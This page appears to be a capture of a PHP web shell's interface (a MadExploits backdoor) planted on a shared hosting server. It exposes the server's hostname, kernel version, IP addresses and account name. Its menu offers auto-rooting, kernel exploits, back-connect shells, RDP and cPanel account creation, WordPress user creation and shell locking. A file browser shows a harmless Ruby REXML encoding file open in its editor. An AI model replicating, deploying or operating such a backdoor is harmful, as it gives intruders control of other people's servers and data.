Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
lib64 /
ruby /
1.8 /
rexml /
encodings /
[ HOME SHELL ]
Name
Size
Permission
Action
CP-1252.rb
4.04
KB
-rw-r--r--
EUC-JP.rb
595
B
-rw-r--r--
ICONV.rb
433
B
-rw-r--r--
ISO-8859-1.rb
134
B
-rw-r--r--
ISO-8859-15.rb
2.25
KB
-rw-r--r--
SHIFT-JIS.rb
647
B
-rw-r--r--
SHIFT_JIS.rb
36
B
-rw-r--r--
UNILE.rb
746
B
-rw-r--r--
US-ASCII.rb
654
B
-rw-r--r--
UTF-16.rb
793
B
-rw-r--r--
UTF-8.rb
268
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SHIFT-JIS.rb
module REXML module Encoding begin require 'uconv' def decode_sjis content Uconv::sjistou8(content) end def encode_sjis(str) Uconv::u8tosjis(str) end rescue LoadError require 'nkf' SJISTOU8 = '-Swm0x' U8TOSJIS = '-Wsm0x' def decode_sjis(str) NKF.nkf(SJISTOU8, str) end def encode_sjis content NKF.nkf(U8TOSJIS, content) end end b = proc do |obj| class << obj alias decode decode_sjis alias encode encode_sjis end end register("SHIFT-JIS", &b) register("SHIFT_JIS", &b) end end
Close